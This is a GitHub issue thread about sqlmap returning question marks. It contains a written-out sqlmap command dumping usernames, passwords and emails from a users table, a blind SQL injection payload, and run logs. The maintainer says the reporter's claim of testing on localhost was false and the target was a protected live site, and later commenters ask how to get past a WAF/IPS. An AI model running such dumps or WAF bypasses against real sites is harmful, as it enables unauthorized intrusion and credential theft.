search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.86k stars 5.66k forks source link

Data retrieval problem - Question Marks (utf8?) #281

Closed shayanb closed 11 years ago

shayanb commented 11 years ago

I'm trying to retrieve some columns from a database but all I get are question marks. It worked great for DB name and column names (column names had some missing characters though) but nothing works for the data:

./sqlmap.py -u "http://localhost/upc/view_comments.php?gal=1" --dbms=mysql --threads 3 --dump -D mo_upc -T users -C user,pass,email --no-cast

Output:

[11:49:40] [INFO] testing connection to the target url
[11:49:41] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---
Place: GET
Parameter: gal
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gal=1' AND 3457=3457 AND 'YuoM'='YuoM

---
[11:49:41] [INFO] testing MySQL
[11:49:41] [INFO] confirming MySQL
[11:49:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[11:49:41] [INFO] fetching entries of column(s) 'email, pass, user' for table 'users' in database 'mo_upc'
[11:49:41] [INFO] fetching number of column(s) 'email, pass, user' entries for table 'users' in database 'mo_upc'
[11:49:41] [INFO] retrieving the length of query output
[11:49:41] [INFO] retrieved: 
[11:49:42] [WARNING] reflective value(s) found and filtering out

[11:49:43] [INFO] resumed: 7
[11:49:43] [INFO] retrieving the length of query output
sqlmap got a 302 redirect to 'http://localhost/upc'. Do you want to follow? [Y/n] n
[11:49:46] [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large')
[11:49:46] [WARNING] turning off page compression
[11:49:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[11:49:46] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
15
[11:50:05] [INFO] retrieved: ???????????????             
[11:50:05] [INFO] retrieving the length of query output
[11:50:05] [INFO] retrieved: 9
[11:50:20] [INFO] retrieved: ?????????           
[11:50:20] [INFO] retrieving the length of query output
[11:50:20] [INFO] retrieved: 6
[11:50:24] [INFO] retrieved: ???___ 3/6 (50%)^C

[11:50:25] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[11:50:25] [INFO] retrieved: ??????
[11:50:25] [WARNING] Ctrl+C detected in dumping phase                          
[11:50:25] [INFO] analyzing table dump for possible password hashes
Database: mo_upc
Table: users
[1 entry]
+-----------+------+-----------------+
| pass      | user | email           |
+-----------+------+-----------------+
| ????????? | ??????????????? |
+-----------+------+-----------------+

I also added --charset=utf-8 and --charset=utf8 but it doesn't seem to work.

stamparm commented 11 years ago

That error detected invalid data for declared content encoding 'gzip' ('size too large') means that you are getting either invalid compressed data or too large file (>100MB). Something is wrong here, but I wouldn't blame sqlmap for sure.

Could you please provide more details to miroslav@sqlmap.org ?

shayanb commented 11 years ago

What details are needed?

I got the same error when extracting the DB name and columns but they worked out.

stamparm commented 11 years ago

could you please send traffic file for that case? you can get it by just appending: --fresh-queries -t traffic.txt for that same run

shayanb commented 11 years ago

I just sent the email with the file attached. I had to abort (CRTL + C) the data retrieval after 2 rows though as it was on the live version.

stamparm commented 11 years ago

False statements about "live" and "localhost" installation. "Live" site had protection. Details known to me.

shayanb commented 11 years ago

Hope my explanations resolved the issue! thanks for the support though!

sagakrypto commented 10 years ago

Hello! There. Is there any impact of [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large') on database or tables retrieval? I am also suffering from same issue, I got the injection point but get invalid characters in database and banner names.

stamparm commented 10 years ago

[ERROR] detected invalid data for declared content encoding 'gzip' ('size too large') on database or tables retrieval - is usually a sign of some kind of WAF/IPS (they trick attackers to download massive fake responses)

get invalid characters in database and banner names. - if you get invalid characters everywhere, then you are most probably dealing with a false positive.

sagakrypto commented 10 years ago

Is there any way to bypass this WAF/IPS and retrieve the real dbs and banners?

stamparm commented 10 years ago

Usually you'll need to find out it yourself (through manual exploitation). It really depends from case to case.

ashee69 commented 9 years ago

hello @stamparm , excuse me for commenting on someone else's thread i am also in the same situation but sqlmap is extracting valid data, but it is extremely slow. some details about database : web server operating system: Linux CentOS 6.5 web application technology: Apache 2.2.15 back-end DBMS: MySQL 5.0.11

and thats how it is behaving [17:09:15] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [17:09:15] [WARNING] time-based comparison requires larger statistical model, please wait............................. [17:10:17] [DEBUG] declared web page charset 'utf-8' [17:10:17] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors

first extracting some long characters then making them a valid data. is there any way to augment the data retrieval and also please suggest me any document to read about whats happening there. thank you.